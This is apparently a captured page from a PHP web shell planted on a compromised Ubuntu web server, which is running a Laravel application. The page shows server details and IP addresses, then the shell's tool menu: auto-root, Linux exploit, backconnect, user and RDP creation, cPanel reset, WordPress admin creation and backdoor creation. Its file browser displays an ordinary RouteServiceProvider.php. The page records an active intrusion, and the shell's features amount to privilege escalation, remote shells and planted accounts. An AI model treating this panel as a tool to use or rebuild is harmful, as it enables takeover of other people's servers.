Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 18.223.170.69
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
dev /
core /
app /
Providers /
[ HOME SHELL ]
Name
Size
Permission
Action
AppServiceProvider.php
545
B
-rw-r--r--
AuthServiceProvider.php
578
B
-rw-r--r--
BroadcastServiceProvider.php
380
B
-rw-r--r--
EventServiceProvider.php
685
B
-rw-r--r--
FortifyServiceProvider.php
889
B
-rw-r--r--
JetstreamServiceProvider.php
932
B
-rw-r--r--
RouteServiceProvider.php
2.97
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : RouteServiceProvider.php
<?php namespace App\Providers; use Illuminate\Cache\RateLimiting\Limit; use Illuminate\Foundation\Support\Providers\RouteServiceProvider as ServiceProvider; use Illuminate\Http\Request; use Illuminate\Support\Facades\RateLimiter; use Illuminate\Support\Facades\Route; class RouteServiceProvider extends ServiceProvider { /** * This namespace is applied to your controller routes. * * In addition, it is set as the URL generator's root namespace. * * @var string */ protected $namespace = 'App\Http\Controllers'; protected $dashboardNamespace = 'App\Http\Controllers\Dashboard'; protected $apisNamespace = 'App\Http\Controllers\APIs'; /** * The path to the "home" route for your application. * * @var string */ public const HOME = '/home'; /** * Define your route model bindings, pattern filters, etc. * * @return void */ public function boot() { // $this->configureRateLimiting(); parent::boot(); } /** * Define the routes for the application. * * @return void */ public function map() { $this->mapApiRoutes(); $this->mapDashboardRoutes(); $this->mapApisRoutes(); $this->mapWebRoutes(); // } /** * Define the "web" routes for the application. * * These routes all receive session state, CSRF protection, etc. * * @return void */ protected function mapWebRoutes() { Route::middleware('web') ->namespace($this->namespace) ->group(base_path('routes/web.php')); } /** * Define the "api" routes for the application. * * These routes are typically stateless. * * @return void */ protected function mapApiRoutes() { Route::prefix('api') ->middleware('api') ->namespace($this->namespace) ->group(base_path('routes/api.php')); } /** * Define the "Dashboard" routes for the application. * * These routes are typically stateless. * * @return void */ protected function mapDashboardRoutes() { Route::prefix(env('BACKEND_PATH')) ->middleware('auth') ->namespace($this->dashboardNamespace) ->group(base_path('routes/dashboard.php')); } /** * Define the "APIs" routes for the application. * * These routes are typically stateless. * * @return void */ protected function mapApisRoutes() { Route::prefix("/api/v1") ->middleware('web') ->namespace($this->apisNamespace) ->group(base_path('routes/apis.php')); } /** * Configure the rate limiters for the application. * * @return void */ protected function configureRateLimiting() { RateLimiter::for('api', function (Request $request) { return Limit::perMinute(60); }); } }
Close